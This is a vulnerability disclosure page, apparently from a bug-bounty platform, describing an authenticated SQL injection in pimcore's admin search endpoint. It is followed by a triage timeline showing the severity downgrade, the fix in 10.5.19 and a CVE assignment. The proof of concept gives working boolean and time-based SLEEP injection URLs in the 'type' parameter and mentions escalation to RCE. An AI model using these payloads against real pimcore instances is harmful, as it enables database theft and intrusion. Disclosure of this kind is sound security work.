SQL injection search function in pimcore/pimcore

Valid

Reported on

Feb 24th 2023


Description

Please enter a description of the vulnerability.

Link POC: https://drive.google.com/drive/folders/1oFZPVrJ7lID7tDArO8spsMy1VYr_4oOb?usp=sharing

Proof of Concept

Step 1: login https://demo.pimcore.fun/admin/ Step 2: user search function and intercept request with burp Step 3: Exploit time Payload to get the length banner of DB

/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+length(@@version))=39+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1

Payload Check time base

time sleep 5

/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(5)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1

time sleep 0

/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(0)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1

FUZZ with sqlmap

Impact

Attacker can get full DB and maybe RCE knowing the WEBROOT path. In this case I know WEBROOT so I can RCE through the article (https://viblo.asia/p/efiens-ctf-2019-write-up-tu-sql-injection-toi-rce-va-get- root-oOVlYom4K8W)

We are processing your report and will contact the pimcore team within 24 hours. 7 months ago
We have contacted a member of the pimcore team and are waiting to hear back 7 months ago
pimcore/pimcore maintainer has acknowledged this report 7 months ago
com0t
7 months ago

Researcher


hi, any update?

com0t
6 months ago

Researcher


hi, any update?

Divesh Pahuja modified the Severity from Critical (9.1) to Medium (6.7) 6 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Divesh Pahuja validated this vulnerability 6 months ago

Updated the severity to Medium as you still needs to be authenticated to call this action and limited the users with permissions to the admin.

com0t has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Divesh Pahuja marked this as fixed in 10.5.19 with commit 367b74 6 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Divesh Pahuja published this vulnerability 6 months ago
com0t
6 months ago

Researcher


Hi, I need you to clarify where admin rights are needed to exploit. The system can decentralize users, so I think only users with search permission can exploit this vulnerability.

to join this conversation